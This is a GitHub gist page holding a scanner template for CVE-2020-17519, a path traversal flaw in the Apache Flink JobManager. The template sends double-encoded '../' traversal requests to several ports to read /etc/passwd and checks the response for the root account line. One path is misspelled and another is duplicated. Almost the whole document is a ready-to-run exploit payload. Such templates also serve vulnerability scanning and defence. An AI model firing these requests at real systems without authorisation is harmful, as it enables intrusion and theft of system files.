-
-
Save 0xSojalSec/20324f2f0dce3d1856e3dad77e1610a8 to your computer and use it in GitHub Desktop.
CVE-2020-17519
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2020-17519 | |
info: | |
name: Apache Flink Arbitrary file reading with JobManager | |
author: 0x240x23elu & 0rich1 of Ant Security FG Lab | |
severity: High | |
requests: | |
- method: GET | |
path: | |
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpassw" | |
- "{{BaseURL}}/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" | |
- "{{BaseURL}}:8081/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" | |
- "{{BaseURL}}:8080/#/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" | |
- "{{BaseURL}}:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" | |
- "{{BaseURL}}:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" | |
matchers: | |
- type: regex | |
regex: | |
- "root:[x*]:0:0:" | |
part: body |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment